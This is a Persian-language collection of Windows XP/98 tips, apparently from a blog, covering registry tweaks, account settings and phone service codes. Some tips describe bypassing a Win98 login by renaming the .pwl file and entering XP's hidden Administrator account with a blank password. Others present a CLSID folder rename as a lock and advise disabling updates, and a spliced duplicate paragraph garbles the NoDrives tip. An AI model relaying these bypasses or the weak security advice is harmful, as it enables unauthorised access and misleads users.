در صورتی که ویندوز شما xp تخصصی باشد ابتدا وارد منوی start شده و سپس بر روی گزینه my computer کلیک نید و از منوی tools گزینه folder option را انتخاب کنید.
مشاهده می کنید که منوی
View در سمت بالا مشهود است . سپس گزینه use simple file sharing (Recommended) را غیر فعال کنید گزینه Ok را کلیک کنید.

 

چگونه می توان منوهای متن را کد گذاری کرد؟

پارتیشن های NTFS این امکان را فراهم می کنند که دادها را بتوان کد گذاری کرد .
با یک سری از دستورات می توان به راحتی به این مهم دست یافت . ویرایشگر ریجستری را باز کنید و اطلاعات زیر را پیدا کنید:
HKEY _ CURRENT_USERsoftwaremicrosoftwindowscurrent versionexplorerAdvanced
سپس بر روی گزینه
Encryption context menu کلیک کنید و ارزش آن را 1 قرار دهید

 

چگونه نرم افزارهای قدیمی را که روی ایکس پی نصب نمی شود نصب کنیم

حتما شما هم دوست دارید که ویندوز XP را بر روی سیستم خود نصب نمایید. ولی به علت اینکه ممکن است بعضی از نرم افزارهای قدیمی شما، بر روی این سیستم عامل کار نکند، شما تا به حال اینکار را نکردید. اما به وسیله Program Compatibility Wizard، شما می توانید نرم افزارهای قدیمی خود را بر روی این سیستم عامل اجرا نمایید.

برای اجرای این نرم افزار، کارهای زیر را دنبال کنید:

1-
Start > Programs > Accessories > Program Compatibility Wizard

2-
Start > All Programs > Accessores > Program Compatibility Wizard

مرحله 1 برای حالتی است که شما از منوی استارت
Classic در ویندوز XP استفاده می کنید.

مرحله 2 برای حالتی است که شما از منوی استارت
New در ویندوز XP استفاده می کنید.

پس از اجرای برنامه، صفحه خوش آمدگویی حاضر می شود.



Welcome to the Program Compatibility Wizard



If you are experiencing problems with a program that worked correctly on an earlier version of Windows, this wizard helps you select and test compatibility settings that may fix those problems.



Caution: It is recommended that you do not use this wizard for older virus detection, backup, or system programs.



To continue, click Next.

 

این صفحه ضمن خوش آمدگویی به شما، می گوید که اگر شما نرم افزارهایی را دارید که در ویندوزهای قدیمی به درستی کار می کردند و حالا با این ویندوز، ناسازگار هستند، این ویزارد به شما کمک می کند که این مشکلات را برطرف کنید. همچنین به شما می گوید که از این ویزارد، برای اجرای برنامه های ضد ویروس، Backup گیری و سیستمی استفاده نکنید. برای ادامه بر روی دکمه Next کلیک کنید.



How do you want to locate the program that you would like to run with compatibility settings?



1-
I want to choose from a list of programs

2-
I want to use the program in the CD-ROM drive

3-
I want to locate the program manually



گزینه 1، لیستی از نرم افزارهای نصب شده در ویندوز را در اختیارتان قرار می دهد.

گزینه 2، به شما امکان می دهد که نرم افزاری را از روی
CD انتخاب کنید.

گزینه 3، به شما این اجازه را می دهد که به دنبال برنامه خود درون هارد دیسک بگردید.

ما در اینجا گزینه 3 را انتخاب می کنیم. صفحه ای ظاهر می شود.



Which program do you want to run with compatibility settings?



Type the path to the program shortcut or executable file



بر روی دکمه
Browse کلیک کنید و دنبال Shortcut و یا برنامه اجرایی خود بگردید. به طور معمول، این ویزارد به دنبال فایلهایی با پسوند exe, com, pif, cmd, bat, lnk می گردد. با کلیک بر روی دکمه Next به مرحله بعدی می روید.



Select a compatibility mode for the program



Choose the operating system that is recommended for this program, or that previously supported the program correctly



Microsoft Windows 95

Microsoft Windows NT 4.0 (Service Pack 5)

Microsoft Windows 98 / Windows ME

Microsoft Windows 2000

Do not apply a compatibility mode



در این صفحه، شما باید ویندوزی را انتخاب کنید که نرم افزار مورد نظر، بر روی آن ویندوز به درستی کار می کند. پس از انتخاب ویندوز مورد نظر، بر روی دکمه
Next کلیک کنید.



Select display settings for the program



Choose the settings that are recommended for this program, or that previously supported the program correctly



256
colors

640
x 480 screen resolution

Disable visual themes

(
By default, Windows XP uses visual themes that may change the appearance or behavior of other programs)



با انتخاب گزینه اول، برنامه مورد نظر شما در حالت 256 رنگ اجرا می شود.

با انتخاب گزینه دوم، برنامه مورد نظر شما در حالت 480 * 640 اجرا می شود.

از گزینه سوم نیز می توانید برای غیر فعال کردن
theme، در نرم افزار مورد نظر استفاده کنید. (منظور همان theme جدید در ویندوز XP می باشد.) با کلیک بر روی دکمه Next صفحه زیر نمایان می شود.



Test your compatibility settings



Program name or path:

Your File Name Is Here

Compatibility settings to apply:

Your Selected OS Is Here



To test the program with the new compatibility settings, click Next.

After verifying whether the program worked correctly, return to this wizard.



در این صفحه، شما مروری بر مراحل گذشته دارید. با کلیک بر روی دکمه
Next، برنامه مورد نظر شما اجرا می شود و صفحه زیر نیز، نشان داده می شود.



Did the program work correctly?



Yes, set this program to always use these compatibility settings

No, try different compatibility settings

No, I am finished trying compatibility settings



اگر برنامه مورد نظر شما به درستی کار کرد، گزینه اول را انتخاب کنید تا تنظیمات انجام شده برای این برنامه، ضبط شود و برنامه شما، همیشه به این صورت اجرا شود.

اگر برنامه مورد نظر شما، مطابق میلتان اجرا نشد، با انتخاب کردن گزینه دوم می توانید تنظیمات دیگری را برای برنامه خود انتخاب نمایید. در حقیقت با انتخاب این گزینه به همان صفحه انتخاب ویندوز می روید و می توانید تمامی کارها را از اول انجام دهید.

اگر هم که خسته شدید و دیدید که این ویزارد هم نتوانست به شما کمکی کند، گزینه سوم را انتخاب کنید.

منبع:born.6te.net

مشکلی که بسیاری از کاربران اینترنت دارند !

یندوز XP این قابلیت را داراست که میتواند وقتی به اینترنت متصل میشوید به طور خود کار فایل های سیستم را به روز رساند و آن ها را از سایت مایکروسافت در یافت کند . اما این امکان بیشتر برای کاربرانی است که نسخه اصلی ویندوز را خریده اند ( نه ایران! ) و به سرعت بالای اینترنت دسترسی دارند . برای اینکه نزدیک به 100 Mb است و هفتگی هم زیادتر میشود ! وقتی که به اینترنت متصل میشوید کمی طول میکشد تا این امکان فراهم شود . ولی باید توجه داشت که سرعت اینترنت شما نیز کم میشود . پس بهتر است که آن را غیر فعال کنید !
برای غیر فعال کردن به روز کردن ویندوز روی آیکون
My Computer کلیک راست کرده و گزینه Properties را انتخاب نمایید . در کادر باز شده به زبانه Automatic Updates بروید و در قسمت Notification Setting ، گزینه Turn Off Automatic Updating را انتخاب نمایید . در پایان دکمه Apply و OK را کلیک کنید .
چیز راحتی هست و ظاهرآ خیلی ساده ولی 50% کاربران به همین علت از سرعت اینترنت خود به شرکتی که اینترنت میگیرند شاکی می شوند !

 

ISP خود را بیشتر بشناسید!

ک شیوه بسیار موثر برای پیدا کردن سرعت و کیفیت یک ISP استفاده از دستور Ping است.
نحوه عملکرد این دستور به این صورت است که یک بسته
۳۲ بایتی را به آدرس مورد نظر شما میفرستد و منتظر پاسخ میماند. براساس زمان بدست آمده از این رفت و برگشت میتوان به سرعت واقعی ISP پی برد. برای اجرای این دستور بصورت زیر عمل کنید.
۱- Command Prompt را اجرا کنید. ( در ویندوز ۲۰۰۰ و نسخه های جدیدتر ویندوز Run را کلیک کرده cmb زا تایپ نمایید )
۲- در صفحه Command Prompt دستور Ping www.yahoo.com-t را تایپ کرده و Enter را بزنید. به جای یاهو هر آدرس دیگری میتوانید استفاده کنید.
۳- برای دیدن نتیجه ctrl+Break و برای خاتمه ctrl+c را بزنید.
پس از زدن دکمه های بالایی اطلاعات بدست آمده از عمل
Ping نشان داده میشود که شامل تعداد بسته های فرستاده شده و دریافت شده، درصد از دست رفتن بسته ها و زمان round tripاست. حال اگر در قسمت Average میانگین به دست آمده حدود ۷۰۰ باشد، نشان دهنده سرعت مطلوب ISP شما است و اگر این عدد بالای ۱۰۰۰ باشد و یا نرتبا پیام Request timed out دریافت کرده باشید ISP شما چندان تعریفی ندارد. البته باید توجه داشته باشید که زمان های بدست آمده به کیفیت سرویس دهنده وب سایتی که آن را Ping میکنید نیز بستگی دارد. بنابراین توصیه میشود سایتی را ping کنید که از کیفیت آن مطمئن باشید، مثلاْ Yahoo

 

لینک مستقیم برای Download

حتما تا به حال برای شما پیش آمده است که بخواهید فایلی را از اینترنت بگیرید، ولی به دلیل اینکه سایت مورد نظر، لینک مسقیم را درون سایت خود قرار نداده بود، شما مجبور بودید که به وسیله خود Browser آن را Download کنید که این راه مشکلاتی را نیز در برداشت. مثلا اگر شما Disconnect می شدید، مجبور بودید که فایل مورد نظر خود را از ابتدا Download کنید. اما به وسیله این روش، ابتدا می توانید لینک مستقیم برای Download فایل مورد نظر خود را پیدا کنید و سپس به وسیله نرم افزارهایی همانند Go!Zilla, DAP, GetRight, FlashGet و ... شروع به Download فایل مورد نظر کنید.
ابتدا بر روی لینک داده شده در سایت، کلیک سمت راست ماوس را زده و از منوی ظاهر شده گزینه
Open In New Window را انتخاب کنید (و یا اینکه کلید Shift را نگه داشته و بر روی لینک کلیک کنید). پنجره جدیدی باز می شود. پس از گذشت 5 الی 6 ثانیه، کلید ESC را فشار دهید و یا دکمه Stop موجود در Browser خود را کلیک کنید تا بارگذاری صفحه متوقف شود. به قسمت Address Bar رفته و کلید Enter را فشار دهید تا صفحه مورد نظر، دوباره شروع به بارگذاری شود. حال در قسمت Status Bar، لینک مستقیم فایل را مشاهده نمایید.

منبع:born.6te.net

 

اضافه کردن اطلاعات اضافی در System Properties

اضافه کردن اطلاعات اضافی در System Properties
اگر بر روی
My Computer کلیک سمت راست ماوس را زده و از منوی ظاهر شده، گزینه Properties را انتخاب کنید، پنجره System Properties ظاهر می شود. اگر می خواهید در این پنجره، اطلاعات دیگری را وارد کنید، باید به صورت زیر عمل کنید.
یک عکس با سایز 180
x114 به وجود آورده و آن را با نام Oemlogo و پسوند bmp، در شاخه SystemRoot%\System% ذخیره نمایید. سپس عبارات زیر را در برنامه Notepad تایپ نموده و آن را تحت عنوان Oeminfo و با پسوند ini، در شاخه SystemRoot%\System% ذخیره نمایید. (بعد از علامت =، می توانید عبارت مورد نظر خود را تایپ نمایید.)

Manufacturer=Your Text Goes Here
Model=Your Text Goes Here
[
Support Information]
Line1=Your Text Goes Here
Line2=Your Text Goes Here
.
.
.
LineN=Your Text Goes Here

* چنان چه عکس مورد نظر شما، نشان داده نشد، آن را در سایز 160
x120 تنظیم نمایید .

منبع:born.6te.net

 

آموزش دستور msconfig1

اینم دستور جالبیه برید به منوی استارت بعد توrun  و تایپ کنید  msconfig
 برید به گزینه 4یعنی 
Boot.iniحالا پایین صفحه یه نوشته هست به نام sosاونو تیک بزنید ok   کنید restart کنید بعد  ببینید چی میشه 

 

آموزش وارد شدن به 98 بدون پسورد

یک فایل با پسوندusername.pwl تو فولدر ویندوز هست که username همون اسم سیستم شماست حالا پسوندشو به OLD  تغییر بدین دوباره که سیستم restart شد بدون دادن پسورد  ok کنید

 

تغییر اطلاعات پیش فرض نام و شرکت

هنگام نصب هر برنامه جدید یک نام و شرکت از شما دریافت می شود .در برخی برنامه ها با

این نام و مشخصات از اطلاعات موجود در سیستم شما دریافتms setup استفاده از ویژگی

و کار شما را در ورود اطلاعات آسان می کند . در صورت اشتباه بودن این اطلاعات از طریق

این ویژگی می توانید اطلاعات مزبور را تصحیح کنید

رجیستری را باز کرده و کلید زیر را در آن ایجاد کنید

"1"را به آن بدهید ومقدار "ShowCompColor" جدید ایجاد کرده ونام DWORD یک مقدار

"0" را برا ی استفاده از رنگهای دیگر و یا

را برا ی رنگ پیش فرض استفاده کنید و برای اعمال تغییرات ویندوز را مجدد راه اندازی کنید


Registry Settings
User Key: [HKEY_CURRENT_USER\Software\Microsoft\

MS Setup (ACME)\User Info]

Value Name: DefName, DefCompany

Data Type: REG_SZ (String Value)

 

منبع:hesamcomputer.blogspot.com

 

 

تغییر پسورد Xp بدون دانستن پسورد قبلی

همون طور که میدونید برای عوض کردن پسورد در ویندوز XP می بایست پسورد قبلی را تایپ کرد و سپس می توان پسورد جدید را جایگزین کرد. شما می توانید با استفاد از این ترفند بدون نیاز به دانستن پسورد قبلی ، پسورد جدیدی را بر روی سیستم قرار دهید.
از منوی استارت گزینه ی
run رو بزنید بعد از اون control userpasswords2 رو تایپ کنید از منویی که باز میشه اسم username ها رو نوشته روی هرکدوم که کلیک کنید اون پایین یه گزینه داره به اسمه reset password اونو که بزنید دوبار پسورد دلخواه خود را تایپ کنید .

 

کنترل کامپیوتر با موبایل

آیا تا به حال به عبارت Remote برخورد کرده‌اید؟ Remote به معنای کنترل کردن چیزی از راه دور است.
با استفاده از نرم‌افزار
Control Freak می‌توانید رایانه خود را در گوشی همراه خود Remote کنید. برای اجرای این برنامه به نرم افزار winamp نیاز دارید.
نرم افزار
Control Freak به شما توانایی آن را می‌دهد تا بتوانید بوسیله‌ی گوشی‌های بلوتوث دار دارای سیستم عامل سیمبیان، نرم افزار Winamp و رایانه‌ی شخصی خود را کنترل نمایید و بتوانید فایل‌های چند رسانه‌ای مانند فایل‌های صوتی و یا فایل‌های تصویری را اجرا نموده مکث دهید متوقف سازید به جلو یا عقب حرکت دهید و یا صدا را کم و زیاد کنید .
اگر در برنامه
Winamp از دکمه‌های اجرای فایل صوتی یا تصویری، Pause،Stop، بعدی، قبلی و ... به وفور استفاده می‌کنید و نیازمند تمام این دکمه‌ها در گوشی خود نیز هستید مطمئن باشید دقیقا تمام این امکانات بر روی نرم‌افزاری که روی گوشی نصب می‌شود نیز وجود دارد.

 

مدیریت شده عمل کنید
با آمدن ورژن 2 نرم‌افزار
Control Freak حال می‌توانید بهتر از گذشته فایل‌های صوتی‌ای را که در برنامه Winamp اجرا می‌کردید را کنترل کنید: البته اگر از Media Library نرم‌افزار Winamp
استفاده کنید.
Media Library نرم‌افزار Winamp یکی از امکانات فوق‌العاده آن است که به کاربران اجازه می‌دهد تمام فایل‌های صوتی و تصویری را با استفاده از این فانکشن، مدیریت و کنترل کنند. بعد از اینکه گوشی همراه شما با رایانه ارتباط برقرار کرد می‌توانید از روی گوشی همراه خود، محتویات داخل Media Library نرم‌افزار Winamp نصب شده روی رایانه را نیز جستجو کنید.
در مقدمه برنامه گفتیم که علاوه بر کنترل نرم‌افزارهای صوتی همانند
Winamp برنامه Control Freak قادر به کنترل فایل‌ها و خود محیط ویندوز با همان سیستم عامل نیز هست. از آن جایی که رایانه می‌تواند کارهای بیشتری را جز پخش فایل‌های صوتی و تصویری انجام دهد با استفاده از Control Freak نگارش 2 آن می‌توانید Desktop رایانه را نیز زیر کنترل خود داشته باشید.

برخی از کارهایی که می‌توان با استفاده از
Control Freak انجام داد.
1- نمایش فایل‌های تصویری چه عکس و چه فایل‌های ویدئویی در تلفن همراه از طریق رایانه
2- نمایش
Presentation ها به مشتریانتان
3- گفتگو با دوستان آنلاین‌تان در هر کجایی که هستید
4- وارسی ایمیل‌هایتان با استفاده از برنامه
Control Freak.
5- بازگشایی برنامه‌های مورد نظر روی رایانه همانند برنامه
Presentation و استفاده از آن‌ها بدون هیچ محدویتی.

موارد مورد نیاز برای کار با نرم افزار :
- گوشی دارای سیستم عامل
Symbian S60 که دارای بلوتوث باشد
- رابط بلوتوث برای اتصال به رایانه
- رایانه همراه با ویندوز 2000 یا
XP
- نرم افزار
Winamp Media Player

راه ارتباطی برنامه با رایانه
برای این که بتوانیم از برنامه بدون هیچ دردسری استفاده کنیم، تنها نیاز به پورت بلوتوث داریم.
نرم‌افزار
Control Freakجزو برنامه‌هایی است که تنها در بستر بلوتوث فعالیت می‌کند و تمام Actionهای بالا نیز تنها با بلوتوث فعال خواهند بود. این Actionها می‌توانند همان پخش شدن فایل‌های صوتی و تصویری و... باشند. از سوی این برنامه نیاز به GPRS یا همان اینترنت روی تلفن همراه ندارد. هر چند که برنامه‌های مشابهی را می‌توان نام برد که با اینترنت این فعالیت‌ها را انجام می‌دهند البته باید به این موضوع هم اشاره کرد که با سرعت GPRS فعلی هرگز نمی‌توان چنین چیزی را در تلفن همراه فراهم کرد، جز این که سرویس Mobile ADSL داشته باشیم. در این برنامه تنها راه ارتباطی گوشی همراه شما با رایانه یک سیستم بلوتوث است که بتواند امواج رادیویی‌اش را در جایی که شما هستید گسترش دهد.

کدام نگارش سیمبیان
برای این که بتوانید برنامه
Control Freak را روی گوشی خود نصب کنید، باید ابتدا از نوع نگارش سیمبیان آن مطلع شوید. این برنامه روی تمام گوشی‌هایی که نگارش سیمبیان آن‌ها جزء سری 60 باشد، به خوبی کار خواهد کرد اگر نگارش سیمبیان گوشی همراه شما S60 V1 و V2 باشد می‌توانید برنامه را اجرا کنید. این برنامه روی نگارش S60 V3 کار نخواهد کرد.

دوستان خود را متحیر کنید
یکی از حرفه‌ای‌ترین قسمت‌های نرم‌افزار
Control Freak طیف آنالیزر آن است. زمانی که فایل صوتی‌‌ای را بر روی گوشی خود با استفاده از برنامه‌ اجرا می‌کنید. نرم‌افزار می‌تواند 40فریم در ثانیه، فایل صوتی‌ای را که پخش می‌کند. هم زمان نیز آنالیز کند و آن را همانند Equalizer به شما نمایش دهد.
تمام ستاره برنامه
Winamp به شما اجازه می‌دهد که روی فایل‌های صوتی و تصویری امتیاز دهید، جالب است که بدانید با استفاده از Control Freak نیز می‌توانید به فایل‌های انتخاب شده خود روی تلفن همراه رای دهید. برای این کار ابتدا فایل صوتی یا تصویری مورد نظر را انتخاب کنید. سپس دکمه ستاره را بزنید. حال می‌بینید که یک ستاره با همان یک امتیاز به فایل مورد نظر داده شده است. تعداد امتیازها چه روی رایانه یا روی گوشی 5 تا خواهد بود.

منبع:rash.blogfa.com

 

نشان دادن سخت افزارهای مخفی

هنگامی که برای دیدن سخت افزارها وارد Device Manager می شوید ممکن است سخت افزارهایی وجود داشته باشند که به دلیل مخفی بودن نشان داده نمی شوند. برای دیدن این سخت افزارها برنامه regedit را اجرا کنید و به مسیر زیر بروید.
HKEY-LOCAL-MACHINE/SYSTEM/Current\controlset\contorolsession\ManagerEnviroment
در این مسیر مقداری به نام
DEVMGTSHOWNONPRSENTDEVICES را پیدا کنید اگر وجود ندارد آن را از نوع String value ایجاد کنید.

 

ارسال محتویات از یک mail به دیگری

در صورتی که از سرویس ایمیل gmail استفاده می کنید، بسیار مفید برای کاربرانی که چند آدرس email دارند وجود دارد ممکن است شما چندین آدرس email برای خود ساخته باشید و به اشخاص مختلف آدرس های مختلفی را بدهید در این صورت به نظر مشکل است که تمام آنها را یک به یک چک کنید. بنابراین می توانید در تنظیمات gmail این امکان را فراهم کنید که به هر آدرسی برای شما پیام ارسال شد یک نسخه از آن به یک آدرس خاص بیاید. برای این کار در gmail بر روی گزینه setting و سپس forwarding and pop کلیک کنید. در بخش forwarding گزینه دوم را کلیک کرده و در کادر مقابل آن آدرس email اصلی خود را وارد کنید تا یک کپی از پیامهای صندوق فعلی به آن آدرس ارسال شود.

 

قفل کردن پوشه ها در xp بی هیـچ نرم افزاری

از منوی Start روی Run کلیک کنید تا منوی Run ظاهر شود حال  cmd را در آن تایپ کنید و اینتر بزنید تا ms-  dos promt ویندوز ظاهر بشود حال به درایوی که پوشه در آن است بروید.بعد فرمان  ren را اجرا کرده یک فاصله بدهید و نام پوشه را وارد کنید دوباره یک فاصله بدهید و دوباره اسم پوشه را وارد کنید و بعد بدون هیچ فاصله ای یه نقطه بگذارید و بعد کد زیر را بنویسید.

({2559a1f2-21d7-11d4-bdaf-00c04f60b9f0})   

طبق الگوی زیر به فقط به جای x نام درایو و به جای folder نام پوشه را بنویسید و بعد اینتر کنید:

x:ren folder folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}   

حال در محیط ویندوز به جایی که پوشه در آنجا بوده بروید فلدر به شکل یه قفل در آمده است.

برای برگرداندن این پوشه به حالت اولیه باید تمام مراحل رو انجام بدید فقط توی تغییر نام به جای کد اولی کد زیر را بنویسید.

x:ren folder.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} folder   

 

 

دادن پسورد

برای اینکار یک روش ساده وجود داره که محتویات داخل یک پوشه را می توان قفل کرد .برای انجام آن به صورت زیر عمل می کنیم ابتدا روی پوشه مورد نظر کلیک راست کرده و از send to گزینه compressed(zipped )folder را انتخاب کنید.بعد از اینکار یک پوشه زیپ شده به همان نام به وجود می آید می آید حال می توانید پوشه اول را پاک کنید.سپس وارد پوشه زیپ شده شوید و بعد پوشه ای که آن را زیپ کرده بودید را می بیند آنگاه از بالای صفحه و قسمت file گزینه Add a password … انتخاب کنید در این لحظه پنجره ای باز می شود که از شما درخواست پسورد می کند پسورد مورد نظر را وارد کنید.بعد اگر بخواهید هر یک از اجزای پوشه را باز کنید از شما پسورد می خواهد.

نکته :برای راحتتر دیدن اجزای پوشه(برای اینکه مرتب از شما پسورد نخواهد)می توانید گزینه Extract all …  را از file  انتخاب کنید در این حالت برای شما با گرفتن پسورد یک کپی از همان پوشه و به همان نام در همان مکانی که پوشه زیپ قرار دارد ساخته می شود حال می توانید محتویات آن را به راحتی ببینید .فقط یادتون باشه حتما بعد از دیدن دوباره پوشه کپی را پاک کنید.

 

گذاشتن کلمه عبور برروی کاربر میهمان

ویندوز XP به طور پیش فرض شامل یک کاربر مهمان می باشد که به طور پیش فرض غیر
فعال است . اگر چه بعضی از وقتها این شناسه کاربری توسط بعضی از برنامه ها فعال میشود.
اگر از ویندوز
XP نسخه حرفه ای استفاده میکنید بهتر این اکانت رو تغییر نام بدید و
همچنین برای این شناسه یک نام کاربری انتخاب کنید .

خب برای انجام این عمل به صورت زیر عمل میکنیم :

1- برروی منوی RUN کلیک کرده

2- تایپ کنید : lusrmgr.msc و اینتر را فشار دهید

3- در پنجره ظاهر شده برروی شناسه Guest راست کلیک کرده و Set Password را انتخاب کنید

4- الان باید یک پنجره اخطار ظاهر بشه که شما دکمه Proceed را انتخاب کنید

5- پسورد را به طور کامل وارد کنید و دکمه تائید را بزنید

6- خب پسورد تغییر داده شد هم اکنون روی Guest راست کلیک کرده و گزینه Rename
را فشار
دهید .

7- اگر علامت ضرب در به نشانه غیر فعال بودن این شناسه را برروی عبارت Guest مشاهده
کردید . بعد از راست کلیک کردن گزینه خصوصیات
Properties را انتخاب کرده و گزینه Account
is disabled را انتخاب کنید.

 

غیر فعال کردن شناسه مدیریت Administrator account

شناسه Administrator یکی از مهم ترین شناسه های کاربری در هر کامپوتر است. به طور پیش
فرض بهتره کاربران با این شناسه کار نکنند ...

همان طور که قبلا ذکر شده بود در صورتی که ویندوز
XP با شناسه ای محافظت شده باشد که
دارای کلمه عبور می باشد میتوانیم با استفاده از دو بار زدن کلید های
Ctrl+alt+del
و ظاهر شدن انتخاب مدیر با نوشتن کلمه
Administrator به جای نام کاربری و خالی گذاشتن
پسورد وارد آن سیستم شد ! آن هم به صورت مدیر !!

خب پس بهتره این شناسه کاربری را غیر فعال کنیم :

مثل بالا مراحل
1 و 2 را انجام بدید

3- برروی شناسه کاربری Administrator راست کلیک کرده و گزینه Rename
را انتخاب کنید
و مثلا نام را به
adminme تغییر بدهید

4- در قدم بعدی با راست کلیک کردن برروی نام تغییر داده شده و انتخاب Properties گزینه
Account is disable را انتخاب کنید و دکمه تائید را برای ثبت تغییرات فشار دهید

 

بررسی خدمات رایگان خطوط ثابت تلفن

بررسی خدمات رایگان خطوط ثابت تلفن

همان طور که اطلاع دارید ، شرکت مخابرات ایران ، خدمات رایگان متنوعی را برای کاربران تلفن های ثابت در نظر گرفته است. اما بسیاری از مردم از این خدمات و نحوه فعال سازی آنها بی خبرند. در این ترفند قصد داریم تمامی این خدمات را معرفی کرده و کدهای فعال سازی هر یک را معرفی کنیم. این خدمات عبارتند از : انتقال مکالمه ، انتظار مکالمه ، شماره‌گیری سریع ، مکالمه از خط اشغال به خطوط دیگر ، سرویس بیدار باش ، سرویس نمایشگر شماره CallerID و دایورت بعد از 5 زنگ.

1- انتقال مکالمه یا دایورت کردن ( Call diverting ) :
با این سرویس می‌توانید هنگامی که با تلفن شما تماس گرفته می‌شود مکالمه را به یک خط دیگر ثابت یا همراه منتقل کنید و عمل دایورت کردن را انجام دهید. این سرویس با هر دستگاه تلفن دکمه‌ای مجهز به سیستم تن انجام شدنی است.
برای این کار شما باید کد زیر را در دستگاه تلفن وارد کنید:
# شماره مورد نظر*21*
بعد از زدن این کد صدایی که میشنوید فرق خواهد کرد ، این یعنی اینکه خط شما دایورت شده است.
برای غیر فعال کردن این سرویس باید باز گوشی رو بردارید (در این حالت باز همان صدای مخصوص شنیده میشود) و بعد عدد #21# را وارد کنید.
در صورتی که مجدد صدای بوق مخصوص را شنیدید ، گوشی را قطع کرده و مجدد روشن کنید. در این حالت خط شما کاملا از حالت دایورت خارج شده است.

2- سرویس انتظار مکالمه یا پشت خطی ( Call waiting ) :
هنگام مکالمه شخص دیگری به شما تلفن می‌زند صدای بوق ضعیفی به گوشتان می‌رسد و شما را آگاه می‌کند شما می‌توانید با کمک این سرویس مکالمه اول خود را موقتاً قطع و با شخص ثالث صحیح کنید پس از خاتمه ی مکالمه یا در حین مکالمه می‌توانید مجدداً با شخص اول به صحبت خود ادامه دهید.
برای استفاده از این سرویس شما باید بهنگام شنیدن صدای بوق ضعیف با فشار دادن دکمه "
Flash" در تلفنهای دیجیتال و با "قطع و وصل کردن" در تلفنهای آنالوگ با نفر سوم تماس برقرار کنید..
برای بازگشت به گفتگوی اول میتوانید همین کار را تکرار کنید.

3- شماره‌گیری سریع ( Speed dealing ):
برای اجتناب از وقوع اشتباه در شماره‌گیری و صرفه جویی در وقت با دادن شماره های دو رقمی به حافظه مخابرات میتونید از این سیستم بهره ببرید. این سرویس با هر دستگاه تلفن دکمه‌ای مجهز به سیستم تن انجام شدنی است.
برای استفاده از این امکان باید دستور زیر رو بکار ببرید :
برای ایجاد کد دو رقمی :
# شماره مورد نظر* کد دو رقمی *51*
بعد از وارد کردن این دستور حالا شما میتونید بعد از برداشتن گوشی با زدن کد دو رقمی** شماره ای رو که قبلا به آن داده اید را شماره گیری کنید.
برای حذف یک شماره از یک کد دو رقمی و تغییر آن میتوانید از دستور زیر استفاده کنید :
# کد دو رقمی *51*
برای غیر فعال کردن همه این کدهای دو رقمی باید از کد #55# استفاده کنید...

4- انتقال مکالمه از خط اشغال به خطوط دیگر ( Call forwarding) :
برای این که تماس گیرندگان با بوق اشغال مواجه نشوند ، می‌توانید یک یا چند شماره تلفن خود را به مرکز تلفن مربوط اعلام کنید که در صورت اشغال بودن هر یک از شماره‌ها ارتباط به طور خودکار به شماره‌های بعدی منتقل شود.
این سرویس با هر دستگاه تلفن دکمه‌ای مجهز به سیستم تن انجام شدنی است.
برای استفاده از این حالت باید بعد از برداشتن گوشی کد #43* رو بزنید ... برای غیر فعال کردن این حالت باید کد #43# را وارد کنید.

5- سرویس بیدار باش :
با اشتراک این سرویس زنگ تلفن در ساعت مشخص شده به صدا در می‌آید .
این سرویس با هر دستگاه تلفن دکمه‌ای مجهز به سیستم تن انجام شدنی ست .
برای استفاده از این حالت باید از روش زیر استفاده کنید:
ابتدا *55* رو بزنید بعد بترتیب ساعت و دقیقه را وارد کنید و در آخر # را بزنید.
مثلا میخواهیم در ساعت 14:38 تلفن زنگ بزند ، این کد را میزنیم :
1438#*55*
برای غیر فعال کردن این سرویس باید کد #55# را وارد کنید.

6- سرویس نمایشگر شماره CallerID
:
در این سرویس شما کافی است یک دستگاه شماره انداز یا یک تلفن مجهز به نمایشگر شماره تلفن را ابتیاع کنید و با استفاده از آن میتوانید شماره را دریافت کنید. این سرویس نیازی به کد فعال سازی ندارد.

7- دایورت بعد از 5 زنگ :
با استفاده از این سرویس شما میتوانید کاری کنید تا بعد از 4 بار زنگ خوردن گوشی و جواب ندادن به گوشی در زنگ 5 ام تلفن دایورت شود روی شماره ای دیگر..
برای استفاده از این سرویس شما باید از کد زیر استفاده کنید:
# شماره مورد نظر*65*
طبق معمول برای غیر فعال کردن این امکان باید کد #65# رو وارد کنید...

 

شاید داخل درایوهاتوون اطلاعات مهمی داشته باشید که نخواید دیگران دستکاریش کنن

شاید داخل درایوهاتوون اطلاعات مهمی داشته باشید که نخواید دیگران دستکاریش کنن
برای این کار باید در
run از start کلمه regedit را تایپ کنید(رجیستری) و مسیر زیر رو برید:

HKEY_CURRENT_ USER/software/microsoft/windows/currentversion/policies/explorer


در این قسمت در صفحه سمت راست ,را

شاید داخل درایوهاتوون اطلاعات مهمی داشته باشید که نخواید دیگران دستکاریش کنن
برای این کار باید در
run از start کلمه regedit را تایپ کنید(رجیستری) و مسیر زیر رو برید:

HKEY_CURRENT_

USER/software/microsoft/windows/currentversion/policies/explorer
در این قسمت در صفحه سمت راست ,راست کلیک کرده و یک مقدار
binary value بسازید ونام اون رو NoDrives بگذارید و مقداری(عدد) را به آن انتصاب دهید و در آخر کامپیوتر را reset یا log off کنید

ست کلیک کرده و یک مقدار binary value بسازید ونام اون رو NoDrives بگذارید و مقداری(عدد) را به آن انتصاب دهید و در آخر کامپیوتر را reset یا log off کنید

 

آشنایی با user های موجود در ویندوز xp #12

در ویندوز xp دو نوع یوزر داریم یوزر لیمیت و ادمین که یوزر لیمیت همانطور که از اسمش بر می آید اختیارات کمتری نسبت به ادمین دارد یوزر ادمین حتی می تواند پسورد یوزر لیمیت و همچنین یوزرهای ادمین دیگر رو عوض کنه (در run عبارت control userpasswords2 را تیپ کرده واینتر بزنید بدون دانستن پسورد قبلی پسورد می توانید پسورد این یوزرها را عوض کنید بدین ترتیب که روی یوزر دلخواه کلیک کنین وreset password را انتخاب کنید) ولی لیمیت قادر به این کار نیست یوزر ادمین می تواند اسم های مختلفی بخود بگیرد ولی یک یوزر مخفی در ویندوز بطور پیشفرض ساخته می شود بنام administartor که این یوزر همانطور که گفتم مخفی است واگر برایش پسورد انتخاب نکنید در هنگام انتخاب یوزر در شروع ویندوز می توان با دو بار زدن alt+ctrl+del وتایپ administrator در قسمت یوزر وزدن اینتر وارد ویندوز شد پس باید روی این یوزر پسورد بذاریم تا کسی بدون پسورد دارد ویندوز نشود

 

خراب کردن صفحه کلید

